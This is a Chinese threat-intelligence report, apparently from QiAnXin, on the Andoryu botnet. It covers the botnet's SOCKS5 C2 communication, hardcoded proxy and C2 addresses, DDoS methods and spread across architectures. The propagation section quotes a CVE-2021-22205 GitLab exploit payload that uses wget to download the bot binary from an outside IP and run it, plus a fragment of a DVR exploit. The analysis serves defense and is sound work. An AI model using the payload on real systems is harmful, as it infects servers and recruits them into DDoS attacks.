1. 概述
通过样本编写者对其僵尸网络的命名,我们将此新型僵尸网络称为Andoryu Botnet,该新型僵尸网络通过Socks5协议与C2进行通信。
Andoryu Botnet 最近传播趋势如下,通过其活跃时间点我们得知Andoryu Botnet当前仅在样本进行更新迭代的时间点前后进行小范围传播,因此可以判断该僵尸网络还处于测试阶段:
2. 样本关键行为分析
|
文件名 |
文件大小 |
文件MD5 |
|
Andoryu.x86 |
42208 bytes |
D203E1BB0BA3E8385FF9E1F83C10EB2D |
2.1 运行参数判定
运行时会首先判断是否存在参数,当存有一个参数时样本才会正常运行:
2.2 字符串加密
样本中的大部分关键字符串加密,运行前期通过一个函数对所有加密的字符串进行批量解密:
2.3 进程名伪装
2.4 打印僵尸网络信息
解密后的字符串中存在该僵尸网络信息,样本运行时将其打印到控制台:
由此命名该僵尸网络为Andoryu Botnet,并且可以了解到编写者测试样本的时间为2022年12月30日。
3. Socks5通信
3.1 通信过程
该僵尸网络通过socks协议进行通信,具体通信过程如下:
一、首先连接硬编码的代理服务器,代理服务器地址为 "152.67.66.37:1080"。
二、与代理服务器成功三次握手后进行socks认证。
三、告知代理服务器需要访问哪个远程服务器,远程服务器地址批量解密时获取,DST_C2 = "172.86.123.20:1025"。
四、socks通信,发送上线包。
五、通过代理接收C2下发指令。
后续我们将持续对Andoryu Botnet进行跟踪并公布其最新动态。
3.2 DDoS方法
|
Name |
Description |
|
icmp-echo |
ICMP Flood |
|
udp-ovh |
UDP Flood for OVH |
|
udp-game |
UDP Game Flood |
|
udp-plain |
UDP Plain Flood |
|
tcp-raw |
TCP Flood |
|
tcp-socket |
TCP Syn Flood |
|
tcp-handshake |
TCP Flood |
4. 样本更新及传播
-
Arm
-
Mips
-
M68K
-
SuperH
-
Sparc
-
x86
CVE-2021-22205:
P(metadata.(Copyright "" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . " b ") )
User-Agent: Abcd<DVR Platform="Hi3520"><SetConfiguration File="service.xml"><
点击阅读原文至ALPHA 6.0
即刻助力威胁研判
原文始发于微信公众号(奇安信威胁情报中心):Andoryu Botnet—基于Socks协议通信的新型僵尸网络
